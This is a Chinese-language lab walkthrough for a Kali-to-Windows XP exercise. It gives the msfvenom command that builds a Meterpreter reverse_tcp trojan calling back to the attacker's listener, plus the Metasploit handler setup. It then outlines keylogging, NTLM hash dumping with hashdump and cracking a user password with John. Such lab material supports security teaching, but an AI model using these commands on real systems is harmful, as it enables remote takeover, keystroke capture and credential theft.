用msfVENOM生成木马并控制中木马的主机实施用户密码破解
一、环境配置(两台主机均采用 NAT 桥接模式)
1、Kali 主机的 IP 配置:192.168.X.X /24
2、winxp 主机的 IP 配置:192.168.X.0 /24
二、远程控制计算机
1、利用msfvenom工具生成一个木马控制端—shell.exe 并把该木马程序保存到 root 用户下
- msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.22 lport=1211 -f exe > /root/shell.exe
复制代码
2、将 shell.exe 文件拷贝到 WINXP 的桌面上
3、启用 MSF 攻击平台
4、加载模块和选择Payload
- msf5 > use exploit/multi/handler
- msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
复制代码
5、设置 Payload 参数
Lhost 为 kali 的 IP Lport 为 kali 监听的端口
- msf5 exploit(multi/handler) > set lhost 192.168.1.22
- msf5 exploit(multi/handler) > set lport 1211
复制代码
6、双击执行 WINXP 主机上的 shell.exe 文件
7、在 kali 上实施渗透攻击
8、在 kali 上实施键盘记录
1 , 输入如下命令启用键盘记录功能
2 . 在 windows xp2 的 CMD.exe 环境下输入命令
3 , 在 kali 上打开键盘记录文件,可以看到文件中记录下来在 windows xp2 中输入的内容。
9、用 john(密码破解工具)破解windows xp2创建的用户密码 实验中用户名为:zs ,密码为:police
1, 将用于破解的密码词典 password.lst 文件拷贝到 root 用户目录下
2, 在 kali 上用命令 hashdump 获取 windows xp2 的用户名及加密后的密码NTLM hash 值
3 , 将 zs 用户的密码 NTLM hash 值保存在zs.hash文件中 并查看
4 , 启用 john 的图形化界面
5 , 打开 zs.hash 文件进行破解
6 , 选择要破解的密码加密算法和密码词典(password.lst)
7 . 开始破解密码
8 , 密码破解成功
|